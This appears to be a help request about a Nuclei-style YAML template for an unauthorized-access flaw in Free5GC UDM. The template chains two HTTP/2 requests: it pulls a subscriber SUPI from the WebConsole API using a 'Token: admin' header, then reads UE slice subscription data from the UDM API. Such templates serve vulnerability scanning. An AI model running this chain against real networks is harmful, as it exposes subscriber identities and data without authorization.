how to send two requests to different ports within the same template？ help！！！

[237693991]

id: 5g_udm_get_ue

info:
name: Free5GC UDM UE Subscription Info Disclosure (Unauthorized Access)
author: auto-attk
severity: high
description: |
Free5GC UDM 未授权接口泄露 UE 切片订阅信息。
攻击者可通过 WebConsole /api/subscriber 接口获取 SUPI，
再访问 UDM /nudm-sdm/v1/{supi}/nssai 接口获取 UE 切片订阅信息。
tags: free5gc,5g,udm,http2,infoleak
variables:
ip: "10.67.3.1"
webconsole_port: "5000"
dport: "8007"
webconsole_url: "http://{{ip}}:{{webconsole_port}}/api/subscriber"
udm_url: "http://{{ip}}:{{dport}}"

http:

第一步：访问 WebConsole API 获取 supi

• raw:

  • |
    GET {{webconsole_url}} HTTP/2
    Host: {{ip}}:{{webconsole_port}}
    User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/113.0 Safari/537.36
    Token: admin

  extractors:

  • type: regex
    name: supi
    part: body
    group: 1
    regex:
    • '"ueId"\s*:\s*"([^"]+)"'
      internal: true

第二步：访问 UDM API 获取 UE 切片订阅信息

• raw:

  • |
    GET {{udm_url}}/nudm-sdm/v1/{{supi}}/nssai?plmn-id={"mcc":"208","mnc":"93"} HTTP/2
    Host: {{ip}}:{{dport}}
    User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/113.0 Safari/537.36
    Token: admin

  matchers-condition: and
  matchers:

  • type: status
    status:
    • 200
  • type: word
    part: body
    words:
    • "sNssai"
    • "sst"
    • "sd"

  extractors:

  • type: regex
    name: sNssai_info
    part: body
    regex:
    • '"sNssai"\s*:\s*{[^}]+}'